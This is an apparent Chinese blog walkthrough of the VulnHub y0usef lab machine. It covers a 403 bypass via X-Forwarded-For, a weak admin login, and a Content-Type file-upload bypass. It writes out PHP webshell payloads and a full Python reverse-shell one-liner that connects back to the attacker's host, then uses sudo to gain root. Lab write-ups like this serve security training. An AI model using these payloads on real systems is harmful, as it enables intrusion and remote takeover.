首页 > 其他分享 >打靶记录8——y0usef

打靶记录8——y0usef

时间:2024-08-08 23:49:10浏览次数:12  
标签:0.102 记录 y0usef URL 打靶 192.168 漏洞 403 上传

靶机地址

https://download.vulnhub.com/y0usef/y0usef.ova

目标

  • 取得root权限+2个flag

涉及的攻击方法

  • 主机发现
  • 端口扫描
  • Web信息收集
  • 指纹探测
  • 403 Bypass
  • 文件上传
  • 提权

主机扫描

nmap -sn 192.168.0.0/24
image.png
192.168.0.102就是靶机地址

端口扫描和服务发现

nmap -p- 192.168.0.102发现只开放了22端口和80端口
image.png
nmap -p22,80 -sV -sC 192.168.0.102

  • -sC 参数告诉nmap在扫描过程中使用默认的脚本进行扫描,这些脚本可以探测和利用主机的各种服务和漏洞。

image.png
发现操作系统可能是Ubantu,HTTP服务是Apache
浏览器直接访问80端口的Web页面看看,robots.txt/admin/login都没有发现
image.png
image.png
Ctrl + U 查看网站源代码,没发现有价值的东西
image.png

信息收集

whatweb进行指纹信息搜集
whatweb http://192.168.0.102,如果看这些组件的版本,发现存在历史漏洞的话就可以尝试利用了
image.png
dirsearch -u http://192.168.0.102扫描一下目录
image.png
访问那个302跳转的页面出现403,服务器拒绝访问
image.png
抓包发现一下信息,和nmap探测到的差不多
image.png
作为渗透者(白帽黑客),看到403的时候,不要直接放弃,我们可以做一个403 Bypass
如果目标系统使用的是基于URL访问路径来进行权限的限制的话,那么可以通过“覆盖URL”的方法有可能绕过403权限限制,使用一些HTTP头部

  • X-Original-URL:
  • X-Rewrite-URL:
  • Referer:
  • X-Originating-IP: 127.0.0.1
  • X-Remote-IP: 127.0.0.1
  • X--Forwarded-For: 127.0.0.1

在HTTP请求头部添加X-Forwarded-For: 127.0.0.1,让服务器认为是自己请求自己,就不会做限制了
image.png
成功返回一个登录的表单的页面
image.png
那我们第一反应就是尝试弱口令,admin/admin,提交时记得加上X-Forwarded-For: 127.0.0.1
image.png
点击Upload File,发现一线曙光,可以上传文件
image.png
文件上传常见绕过方法:

  • 文件扩展名
  • 文件类型
  • 在数据段位置添加真实的图片的头部信息,将PHP的Webshell附加到图片数据的最后部分

准备一个一句话木马的Webshell:

  1. <?php eval($_GET[1]);?>
  2. <?php $var=shell_exec($_GET['cmd']); echo $var ?>

点击上传之后,修改Content-Type: image/png
image.png
获得Web的路径
image.png
访问一下192.168.0.102/adminstration/upload/files/1723112552shell.php让服务器解析我们的Webshell,记得加上X-Forwarded-For: 127.0.0.1
image.png
在URL后面加上?cmd=id成功执行命令
image.png

反弹shell

?cmd=which%20python查看是否有Python
image.png

python -c 'import os,subprocess,socket;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.103",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

image.png
然后可以用python -c "import pty; pty.spawn('/bin/bash')"升级一下shell,让它更具有交互性

提权

查看用户文件cat /etc/passwd,看见yousef用户
image.png
cd /home/home目录看一下,查看第一个flagBase64编码,解码发现ssh的登录账号密码
image.png

ssh : 
user : yousef 
pass : yousef123

直接尝试登录成功
image.png
sudo -l发现可以以root账号执行所有命令,直接sudo su切换成root账号
image.png
Base64解码第二个flag
image.png
image.png

总结

  • 主机发现,端口扫描
  • 针对Web服务进行信息收集,查看源码,爆破路径
  • 针对adminstration的路径进行403 Bypass绕过目标服务器的检查和限制,成功访问到这个URL
  • 发现后台登录的页面存在弱口令admin/admin
  • 发现文件上传漏洞,通过Content-Type:绕过目标服务器对文件上传的过滤机制
  • 利用上传的Webshell进行反弹shell,提权
  • 发现yousef账号,通过第一个flag获得SSH登录账号密码
  • 登录yousef账号后,发现它的sudo配置文件不严导致可以直接提权,切换成root账号

学习记录:

  • 虽然这台靶机的漏洞类型的难度并没有那么的高,但是文件上传漏洞以及403 Bypass这种攻击方法都是我们在日常的渗透测试工作过程当中最经常使用的技术手段,一定要把这些最常用的攻击手段很好的掌握,掌握到熟练的程度,这样其实对我们日常工作的实际性帮助反倒会更大,因为很多高难度的漏洞类型虽然技术含量很高,可以学到更多的技术性的东西,但是在真实的渗透测试的过程当中,遇到一个高难度级别的漏洞的目标系统的概率性很小,所以很多时候你掌握了很多高难度级别漏洞的挖掘方法,并不代表你真实的的工作表现会更好,反倒是我们把这些最常遇到的、经常出现的漏洞类型掌握很好之后,往往可能在日常的工作过程中更能让你取得相应的工作成果,所以往往可能对你的工作发展以及个人能力的体现是更有价值的一件事情。

标签:0.102,记录,y0usef,URL,打靶,192.168,漏洞,403,上传
From: https://www.cnblogs.com/Fab1an/p/18349974

相关文章

  • Cpp中的this指针--复习记录
    1.什么是this指针?  每个类都有一个this指针,我们的非静态成员函数可以通过这个this指针来操作对象的成员属性。this指针存储的就是类的实例的地址,this指针时时刻刻指向的都是这个实例对象本身。由下图可知:我在主函数中栈上创建了一个类的实例(由操作系统自动回收释放......
  • 比赛记录(31~40)
    312024.8.31得分题目T1T2T3T4总分得分\(0\)\(20\)\(60\)\(0\)\(80\)排名:rank\(12\)。2题解T1考虑最小的数,显然它要放到最左边或者最右边,那么它要交换的次数就是它左边比它大的数的个数或者右边比他大的数的个数,两者取\(\min\)即可。显然将最小......
  • 好题记录 8.8
    CF1325FEhab’sLastTheorem题意给定一个nnn个点,mmm条边的无......
  • Sputnik 打靶渗透
    一、信息收集1、查看靶机的MAC地址:2、查看靶机的ip地址:nmap192.168.13.0/243、查看靶机开放的端口:nmap-p--sC-sT-sV-A192.168.13.1594、分别访问靶机的8089、55555和61337端口,发现在61337端口有一个登录框:点击services和servicesNS是一个登录框5、......
  • Pikachu靶场练习记录--2--Cross-Site Scripting(xss)
        1.简述        XSS攻击,即跨站脚本攻击,是一种网络安全威胁。为了避免与层叠样式表(CascadingStyleSheets,CSS)的缩写混淆,因此将跨站脚本攻击缩写为XSS。此类攻击通过在Web页面中插入恶意的脚本代码,用户在访问该页面时,这些嵌入的脚本代码会被执行,从而对用户......
  • Pikachu靶场练习记录--1--Burt Force(暴力破解漏洞)
        1.基于表单的暴力破解随便输入点东西,打开bp拦截抓包。准备好开始进攻          下面显示登陆成功。    2.验证码绕过(onserver)依然使用暴力破解对目标登录成功。    3.验证码绕过(onclient)但是下面的英文显......
  • Java使用POI导入excel记录
    1.controller:@PostMapping("/import-excel")@TransactionalpublicAjaxResultimportExcel(@RequestPart(value="file")MultipartFilefile)throwsException{Stringresult=manufacturerService.importExcel(file);returnAjaxResult.......
  • Redis-Sentinel部署记录
    目录Sentinel哨兵模式介绍Sentinel状态持久化Sentinel作用Sentinel工作方式(每个Sentinel实例都执行的定时任务)三个定时监控任务Sentinel搭建过程所有主机创建sentinel目录所有主机创建sentinel配置文件启动sentinel模拟主库宕机Sentinel常用命令PINGSENTINELmasterSENTINELslave......
  • Redis-主从复制部署记录
    目录主从模式介绍作用工作原理全量同步增量同步主库是否要开启持久化?主从搭建过程主机规划下载redis安装依赖关闭防火墙编译安装redis所有主机配置环境变量所有主机创建Redis的数据存储目录所有主机创建配置文件启动redis使用system管理启动警告处理开启主从从库开启主从主库查看......
  • 工作日志(记录自己的日常学习和腹诽)
    工作日志为了纪念自己的学习经历,也为了记录自己的试错过程创建于2024.6.11作者:刘佳琪[email protected]安装Keil5,破解软件需要防止被电脑病毒查杀功能删掉。24.06.18proteus8.13版本,51单片机串口无效,需替换MCS8051_7.DLL文件到MCS8051.DLL文件并改名为......